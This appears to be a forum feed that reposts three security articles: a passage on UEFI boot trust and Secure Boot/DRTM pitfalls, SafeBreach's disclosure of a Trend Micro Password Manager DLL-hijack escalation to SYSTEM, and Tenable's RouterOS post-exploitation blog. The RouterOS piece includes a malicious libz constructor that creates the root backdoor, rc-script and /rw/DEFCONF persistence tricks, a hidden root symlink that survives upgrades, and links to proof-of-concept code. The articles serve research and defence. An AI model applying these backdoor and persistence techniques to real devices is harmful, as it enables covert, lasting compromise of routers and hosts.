boot application. Boot menu entries are specified in EFI variables and EFI boot binaries are usually resident on the relevant EFI system partition. In order to discover + use the system partition, DXE must already (a) have a FAT driver loaded such that it can make sense of the file system (which is FAT-based) and (b) parse the GUID Partition Table (GPT) to discover where the system partition is on disk. The first Windows-related code to run (ignoring any Microsoft-provided PEIMs or DXE drivers is the Windows Boot Manager (bootmgrfw.efi). The Windows Boot Manager is the initial boot loader required to get Windows running. It uses the EFI Boot-time Service-provided block IO protocol to transact with the disk (such that it doesn't need to mess around with working out how to communicate with the hardware itself). Mainly, it's responsible for selecting the configured Windows boot loader and invoking it (but it does some other stuff like setting up security policies, checking if resuming from hibernation or recovery boot is needed, etc.). TSL Directly after BDS is done, we've got the TSL (Transient System Load) phase; a fancy way of describing the phase where the boot loader actually brings up the operating system and tears down the unnecessary parts of DXE. In the Windows world, the Windows Boot Manager will now launch the Windows Boot Loader (winload.efi) - after performing the necessary verification (if Secure Boot is enabled). The Windows Boot Loader is a heftier beast and is performs some interesting work. In the simplest - not-caring-about-anything-security-related - flow, winload.efi is responsible for initializing the execution environment such that the kernel can execute. This includes enabling paging and setting up the Kernel's page tables, dispatch tables, stacks, etc. It also loads the SYSTEM registry hive (read-only, I believe) and the kernel module itself - ntoskrnl.exe (and once-upon-a-time hal.dll as well). Just before passing control to the NT kernel, winload will call ExitBootServices() to tear down the boot-time services still exposed from DXE (leaving just the runtime services available). SetVirtualAddressMap to virtualize the firmware services (i.e. informing the DXE boot-time service handler of the relevant virtual address mappings). Carrying on with our theme of attempting to understand how trusted computing is enabled (now with Windows as the focus), on a machine with Secure Boot enabled, winload will of course only agree to load any images after first ensuring they pass verification policy (and measuring the respective images into the TPM, as necessary). I'd encourage all Windows 10 users to enable 'Core Isolation' (available in the system Settings). This will enable HVCI (Hypervisor-enforced Kernel-mode code integrity) on the system; in turn meaning that the Microsoft HyperV hypervisor platform will run, such that VBS (Virtualization-based Security) features enabled by VSM (Virtual Secure Mode) will be available. In this scenario winload is responsible for bringing up the hypervisor, securekernel, etc. but diving into that requires a separate post (and others have done justice to it anyway). RT The kernel will now perform it's own initialization and set up things just right - loading drivers etc; taking us to the stage most people identify as being the 'end of boot'. The only EFI services still available to the OS are the EFI Runtime Services which the OS will invoke as necessary (e.g. when reading/writing UEFI variables, shutdown, etc.). This part of the UEFI life-cycle is termed the RT (RunTime). SRTM/DRTM and rambling thoughts We should now have a rudimentary understanding of the general boot flow. I do want to back up a bit though and again discuss the verified boot flow and where the pitfalls can lie. Hopefully one can see how relatively complex this all is, and ensuring that players get everything correct is often a challenge. Everything that we've discussed until now is part of what we term the SRTM (Static Root-of-Trust for Measurement) flow. This basically means that, from the OS's perspective, all parts of the flow up until it, itself, boots form part of the TCB (Trusted Computing Base). Let's dissect this for a moment. The initial trust is rooted in the CPU+chipset vendor. In Intel's case, we have the CPU ROM and the CSME ROM as joint roots-of-trust. Ok, Intel, AMD et. al. are pretty well versed in security stuff after all - perhaps we're happy to trust they have done their jobs here (history says not; but it is getting better with time and hey, we've got to trust someone). But once the ACM verifies the IBB, we have moved responsibility to OEM vendor code. Now I'll be charitable here and say that often this code is godawful from a security perspective. There is a significant amount of code (just count the PEIMs and DXE drivers) sourced from all over the place and often these folk simply don't have the security expertise to implement things properly. The OEM-owned IBB measures the OEM-owned OBB which measures the OS bootloader. We might trust the OS vendor to also do good work here (again, not fool proof) but we have this black hole of potential security pitfalls for OEM vendors to collapse in to. And if UEFI is compromised, it doesn't matter how good the OS bootloader verification flows are. Basically this thing is only as good as its weakest link; and that, traditionally, has been UEFI. Let's identify some SRTM pitfalls. Starting with the obvious: if the CPU ROM or CSME/PSP ROMs are compromised, everything falls apart (same is of course true with DRTM, described below). I wish I could say that there aren't issues here with specific vendors, but that would be disingenuous. Let us assume for now the CPU folk have gotten their act together. We now land ourselves in the IBB or some segment verified by the ACM/PSP. The first pitfall is that the OEM vendor needs to actually present the correct parts of the firmware for verification by the ACM. Sometimes modules are left out and are just happily executed by the PEI (as they've also short-circuited PEIM verification). Worse, the ACM requires an OEM key to verify the IBB (hence why it needs the CSME in the first place) - some OEMs haven't burned in their key properly or are using test keys are haven't set the EOM (End of Manufacturing) fuse allowing carte blanche attacks against this (and even worse, lack of OEM action here can actually lead to these security features being hijacked to protect malicious code itself). OEMs need to be wary about making sure that when PEI switches over to main system memory a TOCTOU attack isn't opened up by re-reading modules of SPI and assuming they are trusted. Furthermore, for verified boot to work, there needs to be some PEI module responsible for verifying DXE but if the OEM has stuffed up and the IBB isn't verified properly at all, then this module can be tampered with and the flow falls apart. Oh and this OEM code could do the whole verification bit correctly and simply do a 'I'll just execute this code-that-failed verification and ask it to reset the platform because I'll tell it that it, itself, failed verification' (oh yes, this happened). And there are all those complex flows that I haven't spoken about at all - e.g. resuming from sleep states and needing to protect the integrity of saved contexts correctly. Also, just enabling the disparate security features seems beyond some OEMs - even basic ones like 'don't allow arbitrary runtime writes to the flash' are ignored. Getting this correct requires deep knowledge of the space. For example, vendors have traditionally not considered the evil maid attack in scope and TOCTOU attacks have been demonstrated against the verification of both the IBB and OBB. Carrying on though, let's assume that PEI is implemented correctly, what about the DXE module responsible for things down line? Has that been done correctly? Secure Boot has its own complexities, what with its key management and only allowing modification of authenticated UEFI variables by PK owners, etc. etc. I'm not going to go into every aspect of what can go wrong here but honestly we've seen quite a lot of demonstrable issues historically. (To be clear, above I'm speaking about STRM in terms of what ususally goes on in most Windows-based machines today. There are SRTM schemes that do a lot better there - e.g. Google's Titan and Microsoft's Cerberus in which a separate component is interposed between the host/chipset processors + the firmware residing on SPI.) So folk got together and made an attempt to come up with a way to take the UEFI bits out of the TCB. Of course this code still needs to run; but we don't really want to trust it for the purposes of verifying and loading the operating system. So DRTM (Dynamic Root-of-Trust for Measurement) was invented. In essence what this is, is a way to supply potentially multiple pieces of post-UEFI code for verification by the folk that we trust (more than the folk we trust less - i.e. the CPU/chipset vendors (Intel/AMD et al). Instead of just relying on the Secure Boot flow which relies on the OEMs having implemented that properly, we just don't care what UEFI does (it's assumed compromised in the model). Just prior to executing the OS, we execute another ACM via special SENTER/SKINIT instructions (rooted in the CPU Root-of-Trust just like we had with Boot Guard verifying the IBB). This time we ask this ACM to measure a piece of OS-vendor (or other vendor) code called an MLE (Measured Launch Environment) - all measurements extended into PCRs of the TPM of course such that we can attest to them later on. This MLE - after verification by the ACM - is now trusted and can measure the various OS components etc. - bypassing trust in EFI. Now here's my concern: I've heard folk get really excited about DRTM - and rightly so; it's a step forward in terms of security. However I'd like to speak about some potential issues with the 'DRTM solves all' approach. My main concern is that we stop understanding that compromised UEFI can still possibly be damaging to practical security - even in a DRTM-enabled world. SMM is still an area of concern (although there are incoming architectural features that will help address this). But even disregarding SMM, the general purpose operating systems that most of the world's clients + servers run on were designed in a era before our security field matured. Security has been tacked-on for years with increasing complexity. In a practical sense, even our user-modes still execute code that is privileged in the sense of being able to affect the exact damage on a targeted system that attackers are happy to live with (not to forget that our kernel-modes are pretty permissive as well). Remember, attackers don't care about security boundaries or domains of trust; they just want to do what they need to do. As an example, in recent history an actor known as Sednit/Strontium achieved a high degree of persistence on machines by installing DXE implants on platforms that hadn't correctly secured programmatic write access to the SPI flash. Enabling Secure Boot is ineffectual as it only cares about post-DXE; compromised DXE means compromised Secure Boot. Enabling Measured/Verified Boot could *possibly* have helped in this particular case - if we trust the current UEFI code to do its job - but the confidence of that probably isn't high being that these platform folk didn't even disable write access to the SPI (and we've seen Boot Guard rendered ineffectual via DXE manipulation - something Sednit would have been able to do here). So let us assume that Sednit would have been able to get their DXE modules running even under Verified Boot. Anyway, the firmware implants attacked the system by mounting the primary NTFS partition, writing their malicious code to the drive, messing around with the SYSTEM registry hive to ensure that their service is loaded at early boot and... done! That's all that's necessary to compromise a system such that it can persist over an FnR (Format and Restore). (BitLocker can also help defend against this particular type of attack in an SRTM flow; but that's assuming that it's enabled in the first place - and the CRTM is doing its job - and it's not configured in an auto unlock mode). Let's take this scenario into a DRTM world. UEFI 'Secure Boot' compromise becomes somewhat irrelevant with DRTM - the MLE can do the OS verification flow; so that's great. An attacker can no longer unmeasurably modify the OS boot manager, boot loader, kernel (code regions, at least), securekernel, hv with impunity. These are all very good things. But here's the thing: UEFI is untrusted in the DRTM model, so in the threat model we assume that the attacker would be able to run their DXE code - like today. They can do that very same NTFS-write to get their user-mode service on to NTFS volume. Under a default Windows setup - sans a special application control / device guard policy, Windows will happily execute that attacker service (code-signing is completely ineffectual here - that's a totally broken model for Windows user-mode applications). Honestly though, a machine that enabled a DRTM flow would hopefully enable Bitlocker which should be more effectual here as I'd expect that the DRTM measurements are required before unsealing the Bitlocker decryption key (I'm not exactly sure of the implementation details around this), but I wonder to what extent compromised UEFI could mess around with this flow; perhaps by extending the PCRs itself with the values expected from DRTM measurements, unsealing the key, writing its stuff to the drive, reboot? Or, more complexly, launching it's own hypervisor to execute the rest of the Windows boot flow under (perhaps trapping SENTER/SINIT, et. al.??). I'd need to give some thought as to what's possible here, but given the complexity surrounding all this it's not out of the realm of possibility that compromised UEFI can still be damaging. Now, honestly, in terms of something Sednit-like writing an executable to disk, a more restrictive (e.g. state-separated) platform that is discerning about what user- and kernel-mode code it lets run (and with which privileges) might benefit significantly from DRTM - although it seems likely one can affect huge damage on an endpoint via corrupting settings files alone - no code exec required; something like how we view data-corruption via DKOM, except this time 'DCM' (Direct Configuration Manipulation)?? from firmware. DRTM is *excellent*, I'm just cautioning against assuming that it's an automatic 'fix-all' today for platform security issues. I feel more industry research around this may be needed to empirically verify the bounds of its merits. I hope you enjoyed this 'possibly-a-little-more-than-a-primer' view into UEFI boot and some of the trust model that surrounds it. Some hugely important, related things I haven't spoken about include SMM, OROM and secure firmware updates (e.g. Intel BIOS Guard); topics for another time. Please let me know if you found this useful at all (it did take a non-insignificant amount of time to write). Am always happy to receive constructive feedback too. I'd like to end off with a few links to some offensive research work done by some fantastic folk that I've come across over the years - showing what can be done to compromise this flow (some of which I've briefly mentioned above). If you know of any more resources, please send them my way and I'll happily extend this list: https://conference.hitb.org/hitbsecconf2019ams/materials/D1T1 - Toctou Attacks Against Secure Boot - Trammell Hudson & Peter Bosch.pdf https://github.com/rrbranco/BlackHat2017/blob/master/BlackHat2017-BlackBIOS-v0.13-Published.pdf https://medium.com/@matrosov/bypass-intel-boot-guard-cc05edfca3a9 https://embedi.org/blog/bypassing-intel-boot-guard/ https://www.blackhat.com/docs/us-17/wednesday/us-17-Matrosov-Betraying-The-BIOS-Where-The-Guardians-Of-The-BIOS-Are-Failing.pdf https://2016.zeronights.ru/wp-content/uploads/2017/03/Intel-BootGuard.pdf Sursa: https://depletionmode.com/uefi-boot.html
  24. Trend Micro Password Manager - Privilege Escalation to SYSTEM August 14th, 2019 Peleg Hadar, Security Researcher, SafeBreach Labs Introduction SafeBreach Labs discovered a new vulnerability in Trend Micro Password Manager software. In this post, we will demonstrate how this vulnerability could have been used in order to achieve privilege escalation and persistence by loading an arbitrary unsigned DLL into a service that runs as NT AUTHORITY\SYSTEM. Trend Micro Password Manager Trend Micro Password Manager is a standalone software which is also deployed along with the Trend Micro Maximum Security product. The purpose of the software is to manage website passwords and login IDs in one secure location. Part of the software runs as a Windows service executed as “NT AUTHORITY\SYSTEM,” which provides it with very powerful permissions. In this post, we describe the vulnerability we found in the Trend Micro Password Manager. We then demonstrate how this vulnerability can be exploited to achieve privilege escalation, gaining access with NT AUTHORITY\SYSTEM level privileges. Vulnerability Discovery In our initial exploration of the software, we targeted the “Trend Micro Password Manager Central Control Service” (PwmSvc.exe), because: It runs as NT AUTHORITY\SYSTEM - the most privileged user account. This kind of service might be exposed to a user-to-SYSTEM privilege escalation, which is very useful and powerful to an attacker. The executable of the service is signed by Trend Micro and if the hacker finds a way to execute code within this process, it can be used as an application whitelisting bypass. This service automatically starts once the computer boots, which means that it’s a potential target for an attacker to be used as a persistence mechanism. In our exploration, we found that after the Trend Micro Password Manager Central Control Service was started, the PwmSvc.exe signed process was executed as NT AUTHORITY\SYSTEM. Once executed, the service loaded the “Trend Micro White List Module” library (tmwlutil.dll) and we noticed an interesting behavior: As you can see, the service was trying to load a missing DLL file, which eventually was loaded from the c:\python27 directory - a directory within our PATH environment variable. Stay with us, we will analyze the root cause in the next section of the article. PoC Demonstration In our VM, the c:\python27 has an ACL which allows any authenticated user to write files onto the ACL. This makes the privilege escalation simple and allows a regular user to write the missing DLL file and achieve code execution as NT AUTHORITY\SYSTEM. It is important to note that an administrative user or process must (1) set the directory ACLs to allow access to non-admin user accounts, and (2) modify the system’s PATH variable to include that directory. This can be done by different applications. In order to test this privilege escalation vulnerability, we compiled a DLL (unsigned) which writes the following to the filename of a txt file: The name of the process which loaded it The username which executed it The name of the DLL file We were able to load an arbitrary DLL as a regular user and execute our code within a process which is signed by Trend Micro as NT AUTHORITY\SYSTEM. Root Cause Analysis Once the “Trend Micro Whitelist Module” library (tmwlutil.dll) is loaded, it initializes a class called “TAPClass”, which, in turn, tries to load another library called “tmtap.dll”: There are two root causes for the vulnerability: Uncontrolled Search Path - The lack of safe DLL loading. The library tried to load the mentioned DLL files using LoadLibraryW. The problem is that it used only the filename of the DLL, instead of an absolute path. In this case, it’s necessary to use the SetDefaultDllDirectories and/or LoadLibraryExW functions in order to control the paths from which the DLL will be loaded. No digital certificate validation is made against the binary. The program doesn't validate whether the DLL that it is loading is signed (e.g. using the WinVerifyTrust function). Therefore, it can load an arbitrary unsigned DLL. Potential Malicious Uses and Impact Trend Micro Password Manager is deployed with the Trend Micro Maximum Security Software. Below we show two possible ways that an attacker can leverage the vulnerability we discovered and documented above. Signed Execution and Whitelisting Bypass The vulnerability gives attackers the ability to load and execute malicious payloads using a signed service. This ability might be abused by an attacker for different purposes such as execution and evasion, for example: Application Whitelisting Bypass. Persistence Mechanism The vulnerability gives attackers the ability to load and execute malicious payloads in a persistent way, each time the service is being loaded. That means that once the attacker drops a malicious DLL in a vulnerable path, the service will load the malicious code each time it is restarted. Privilege Escalation After an attacker gains access to a computer, he might have limited privileges which can limit his operations to access certain files and data. The service provides him with the ability to operate as NT AUTHORITY\SYSTEM which is the most powerful user in Windows, so he can access almost every file and process which belongs to the user on the computer. Affected Versions Trend Micro Maximum Security / Password Manager 15.0.0.1229 Trend Micro Password Manager Service (PwmSvc.exe) - 3.8.0.1069 Tmwlutil.dll 2.97.0.1161 Timeline July 23th, 2019 - Vulnerability reported to Trend Micro July 24th, 2019 - Initial Response from Trend Micro July 31th, 2019 - Status Update from Trend Micro July 31th, 2019 - Trend Micro resolved the issue and released a new version. Aug 13th, 2019 - Trend Micro has issued CVE-2019-14684 Apr 14th, 2019 - Trend Micro has published a security bulletin: http://esupport.trendmicro.com/en-us/home/pages/technical-support/1123396.aspx Sursa: https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
  25. RouterOS Post Exploitation Shared Objects, RC Scripts, and a Symlink Jacob Baines Aug 15 · 13 min read At DEF CON 27, I presented Help Me, Vulnerabilities! You’re My Only Hope where I discussed the last few years of MikroTik RouterOS exploitation and I released Cleaner Wrasse, a tool to help enable and maintain root shell access in RouterOS 3.x through the current release. ><(((°> The DEF CON talk also covered past and present post exploitation techniques in RouterOS. I roughly broke the discussion into two parts: Places attackers can execute from. How to achieve reboot or upgrade persistence. That is what this blog is about. But why talk about post exploitation? The fact of the matter is these routers have seen a lot of exploitation. But with little to no public research on post exploitation in RouterOS, it isn’t obvious where an analyst might look to determine the scope of the exploitation. Hopefully, this blog and associated tooling can begin to help. A Brief Explanation of Everything Before I start talking about post exploitation, you need to have a better idea of RouterOS’s general design. For our purposes, one of the most important things to understand is everything on the system is a package. Pictured to the left, you can see all the packages I have installed on my hAP. Even the standard Linux-y directories like /bin/, /lib/, /etc/ all come from a package. The system package to be specific. Packages use the NPK file format. Kirils Solovjovs made this excellent graphic that describes the file format. Each NPK contains a squashfs section. On start up, the squashfs file system is extracted and mounted (or symlinked depending on the installation method) in the /pckg/ directory (this isn’t exactly true for the system package but let’s just ignore that). Packages contain read-only filesystems Squashfs is read only. You see I can’t touch /pckg/dhcp/lol. That might lead you to believe that the entire system is read only, but that isn’t the case. For example, /pckg/ is actually part of a read-write tmpfs space in /ram/. /pckg/ is a symlink to the read-write tmpfs /ram/pckg/ Further, the system’s /flash/ directory points to persistent read-write storage. A lot of configuration information is stored there. Also the only persistent storage users have access to, /flash/rw/disk/, is found in this space. The storage the user has access to as seen from a root shell and Webfig While all of the system’s executables appear to reside within read-only space, there does appear to be some read-write space, both tmpfs and persistent, that an attacker can manipulate. The trick is figuring out how to use that space to achieve and maintain execution. The other thing that’s important to know is that users don’t actually have access to a real shell on RouterOS. Above, I’ve included a screenshot where I appear to have a root shell. However, that’s only because I’ve exploited the router and enabled the developer backdoor. This shouldn’t actually be possible, but thanks to the magic of vulnerabilities it is. If you aren’t familiar with the developer backdoor in RouterOS, here is a very quick rundown: Since RouterOS 3.x the system was designed to give you a root busybox shell over telnet or ssh if a special file exists in a specific location on the system (that location has changed over the years). Assuming the special file exists, you access the busybox shell by logging in as the devel user with the admin user’s password. You can see in the following video, I use HackerFantastic’s set tracefile vulnerability to create the special file /pckg/option on RouterOS 6.41.4. The existence of that file enables the backdoor. After I log in as devel, delete the file, and log out, I can no longer access the root shell. Okay, you know enough to be dangerous. Onwards to post exploitation! The attacks are coming from inside SNMP! The snmp binary (/nova/bin/snmp) is part of the system package. However, there are various other packages that want to add their own functionality to snmp. For example, the dhcp package. In the image below, you can see that /pckg/dhcp has an /snmp/ subdirectory. Functionality added to snmp by the dhcp package When the snmp binary starts up, it will loop over all of the directories in /pckg/ and look for the /nova/lib/snmp/ subdirectory. Any shared object in that subdirectory gets passed to dlopen() and then the shared object’s autorun() is invoked. Since the dhcp package is mounted as read-only, an attacker can’t modify the loaded shared object. However, as we’ve established, /pckg/ is read-write so an attacker can introduce their own directory structure (e.g. /pckg/snmp_xploit/nova/lib/snmp/). Any shared object stored there would be loaded by snmp. One of these things is not like the others It’s pretty neat that an attacker can hide within a process that lives in read-only space! But it’s even more useful when combined with a vulnerability that can write files to disk like CVE-2019–3943 or CVE-2018–14847. I wrote a proof of concept to illustrate the use case with CVE-2019–3943. Essentially, an authenticated attacker can create the /pckg/ directory structure using the vulnerability’s directory traversal. https://github.com/tenable/routeros/blob/master/poc/cve_2019_3943_snmp_lib/src/main.cpp#L204 Once the directories are created, the attacker needs to drop a shared object on disk. Luckily, CVE-2019–3943 can do that as well. Obviously, a real attacker can execute anything from their shared object, but for the proof of concept I create the 6.41+ backdoor file directly from a constructor function. https://github.com/tenable/routeros/blob/master/poc/cve_2019_3943_snmp_lib/shared_obj/snmp_exec.c#L4 The PoC will even stop and restart the SNMP process to ensure the shared object gets loaded without a reboot of the system. Since /pckg/ is in tmpfs space, the directory structure the script creates would be removed on a reboot even if the PoC didn’t delete it. I’m in your /rw/lib, executing as one of your dudes Similar to the above, I found that I could get system binaries to load libraries out of /flash/rw/lib. This is because /rw/lib/ is the first entry in the LD_LIBRARY_PATH environment variable. Load libraries from read-write space? What could go wrong. The great thing about loading libraries from /rw/lib/ is that, because it’s persistent file space, the shared object will persist across reboots. The only challenge is figuring out which library we want to hijack. The obvious choice is libc.so since it’s guaranteed to be loaded… everywhere. But RouterOS uses uClibc and, quite frankly, I didn’t want to deal with that. Thankfully, I came upon this. Hello libz! /nova/bin/fileman loads libz. fileman is the system binary that handles reading and writing from the user’s /rw/disk directory via Winbox or Webfig. It gets executed when the user navigates to the “Files” interface, but it shuts down after the user has navigated away and it remains idle for a minute. To compile the malicious library, I simply downloaded libz 1.2.11 and added this constructor to deflate.c: void __attribute__((constructor)) lol(void) { int fork_result = fork(); if (fork_result == 0) { execl("/bin/bash", "bash", "-c", "mkdir /pckg/option; mount -o bind /boot/ /pckg/option", (char *) 0); exit(0); } } You can see, once again, I’ve just chosen to create the backdoor file. For this proof of concept, I cross compiled the new libz.so to MIPS big endian so that I could test it on my hAP router. Once again, the proof of concept uses CVE-2019–3943 to create the “lib” directory and drops the library on disk. However, unlike the SNMP attack, /rw/lib/libz.so will survive reboots and it actually gets loaded quite early in the startup sequence. Which means after every reboot, the backdoor file will get created during start up. Signature verification matters until it doesn’t One of the more interesting things stored in /flash/ is the files in /flash/var/pdb/. “Hey, aren’t those the names of all the packages I have installed?” It turns out that this is where RouterOS stores all of the installed NPK files. Oddly, as root, they are all writeable. I can tell you from experience, you don’t want to overwrite the system package. Haha! Did I just get you to watch the system rebooting over and over again? When I learned I could break the entire system by messing around with the system package, I got kind of curious. What if I was a little more careful? What if I just overwrote the package’s squashfs filesystem? Would that get mounted? I wrote a tool called modify_npk to test this out. The tool is pretty simple, it takes in a valid MikroTik NPK (e.g. dude-6.44.5.npk) and a user-created squashfs. The tool removes the valid MikroTik squashfs section and inserts the user’s malicious squashfs. In theory, modify_npk generates a perfectly well formed NPK… just with a new internal squashfs. The problem is that MikroTik enforces signature verification when installing NPK packages. If you try to install a modify_npk package then RouterOS will flag it as broken and reject it. See wrasse.npk in the following log file: I’m not broken you’re broken Which is obviously good! We can’t have weirdos installing whatever they want on these systems. But what if we install it ourselves from our root shell? Don’t feel bad. I didn’t know echo * was a thing either. In theory, RouterOS should always run a signature check on the stored NPK before mounting their filesystems. Since they are all read-write it only makes sense, right? Oops In the above image, you can see wrasse was successfully installed on the system, bad signature and all! Obviously, that should mean the squashfs I created was mounted. ┬┴┬┴┤(・_├┬┴┬┴ Of course, just having the malicious squashfs mounted isn’t the end, because the filesystem I created actually contains an rc script that will create the backdoor file at startup. This is quite useful as it will persist through reboots. Although, users can catch this particular attack by using the “Check Installation” feature. MikroTik silently patched this bug in 6.42.1. I say “silently” because I don’t see any specific release note or communication to the community that indicates that they decided to enforce signature verification on every reboot. RC scripts everywhere RouterOS uses rc scripts to start processes after boot and to clean up some processes during shutdown. The OS has a traditional /etc/rc.d/run.d/ file structure, that we will talk about, but it also has (or had) other places that rc scripts are executed from as well. /flash/etc/ As mentioned, RouterOS has a traditional /etc/ directory, but since the directory is read-only attackers can’t modify or introduce scripts. However, RouterOS does have a second /etc/ off of the persistent read-write /flash/ space. At first glance, it doesn’t appear all that useful as far as rc scripts go. However, as BigNerd95 pointed out in his Chimay-Red repository, you can create an /rc.d/run.d/ subdirectory off of /flash/etc/ and any rc script stored within will be treated as a normal rc script on startup and shutdown. In the example below, you can see I create /flash/etc/rc.d/run.d/ and echo the script S89lol into place. After a reboot, the script is executed and the developer backdoor is created. This behavior was removed after 6.40.9. Up until then, however, this was a very simple and convenient persistence mechanism. /rw/RESET RouterOS has a bunch of scripts sitting in /etc/rc.d/run.d/, but there are two I want to specifically talk about. The first one is S08config and that is because through 6.40.5 it contained the following logic: elif [ -f /rw/RESET ]; then /bin/bash /rw/RESET rm -rf /rw/RESET Meaning that if /rw/RESET existed then S08config would execute it as a bash script at start up. This is an obvious persistence mechanism. So obvious that it was actually observed in the wild: https://forum.mikrotik.com/viewtopic.php?f=21&t=132499#p650956 Somehow this forum user obtained MikroTik’s debug package and was able to examine some files post exploitation. Here we can see the attacker using /rw/RESET to execute their /rw/info binary. Perhaps seeing this used in the wild is why MikroTik altered S08config’s behavior. /rw/DEFCONF Similar to /rw/RESET, the contents of /rw/DEFCONF can be executed thanks to an eval statement in S12defconf. defcf=$(cat /rw/DEFCONF) echo > /ram/defconf-params if [ -f /nova/bin/flash ]; then /nova/bin/flash --fetch-defconf-params /ram/defconf-params fi (eval $(cat /ram/defconf-params) action=apply /bin/gosh "$defcf"; cp "$defcf" $confirm; rm /rw/DEFCONF /ram/defconf-params) & This was first introduced in 6.40.1, but unlike /rw/RESET this hasn’t been fixed as of 6.45.3. In fact, this is the method that Cleaner Wrasse will use to establish reboot persistence on the router. I wrote a proof of concept using CVE-2019–3943 to show how a remote authenticated attacker can abuse /rw/DEFCONF to achieve the backdoor and establish persistence. /pckg/ As we saw in the signature verification portion of this writeup, each package off of /pckg/ can have an /etc/rc.d/run.d/ directory containing rc scripts. /pckg/ is part of a tmpfs, so while anything an attacker creates in /pckg/ won’t persist across reboots, new rc scripts will get executed at shutdown. How is that useful? One thing I didn’t mention about /rw/DEFCONF is that its existence on the system can cause issues with logging in. Cleaner Wrasse avoids this issue by staging a file in /rw/.lol and then creating an rc script in /pckg/ that creates the /rw/DEFCONF file on shutdown. In that way, Cleaner Wrasse avoids the login problem but ensures /rw/DEFCONF exists when the system starts up again. Simply copy /rw/.lol to /rw/DEFCONF on shutdown. Easy mode. The symlink of survival Many of the proofs of concepts I mention in this blog use CVE-2019–3943, but it was patched for good in May 2019 (6.43.15 Long-term). Unless you use Kirilis Solojov’s USB jailbreak, there are no more public methods to enable the backdoor file and root the device. So how am I able to do this? Root shell on most recent release: 6.45.3 Stable The answer is simple. When I was still able to exploit the router using CVE-2019–3943, I created a hidden symlink to root in the user’s /rw/disk directory. The .survival symlink points to / After an upgrade, you need only FTP into the router and traverse the symlink to root. From there you can achieve execution in one of the many ways that you want. In the following image, I drop libz.so into /rw/lib/ to enable the backdoor. RouterOS doesn’t offer a way for a normal user to create a symlink, so you can only do it via exploitation. But RouterOS doesn’t try to remove the symlink either. As long as that’s the case, we can continue using the survival symlink to reestablish the root shell after upgrade. Neither Winbox or Webfig displays hidden files. It’s probably worthwhile to occasionally check your user directory via FTP to ensure nothing is hidden there. Not pictured: .survival So what happened here? I’ve shared a bunch of ways to achieve execution and generally hang around the system. So I was a little confused when I stumbled across this: y u no opsec? The above image is from the first public report of CVE-2018–14847. Before it had a CVE. Before it was even known by MikroTik. A user popped onto the MikroTik forums and asked about a potential Winbox vulnerability after finding an odd login in their logs and suspicious files on the device. Picture above is from a bash script they found called save.sh. I’ve shown in this blog post, over and over, that an attacker needn’t store anything in the only directory the user can access. Yet, that was exactly what this attacker did. /flash/rw/pckg/ is a symlink to the user’s /flash/rw/disk/ directory. How is it that someone that had a zero day that would later be used against hundreds of thousands, if not millions, of routers didn’t know this simple fact? Thankfully they did make this error though. Not only is CVE-2018–14847 pretty nasty but the resulting fallout has forced MikroTik to do some hardening. Is all this fixable? Of course! Almost everything I’ve talked about here has been fixed, can be fixed with minor changes, or could be fixed just by moving away from executing everything as root. Defense in depth is important, but sometimes it just isn’t a high priority. I don’t expect to see any significant changes in the future, but hopefully MikroTik can work some minor defense in depth improvements into their development plans. …or maybe we’ll just wait for RouterOS 7 to be released Tenable TechBlog Learn how Tenable finds new vulnerabilities and writes the software to help you find them Written by Jacob Baines Sursa: https://medium.com/tenable-techblog/routeros-post-exploitation-784c08044790
  1. Load more activity
×
×
  • Create New...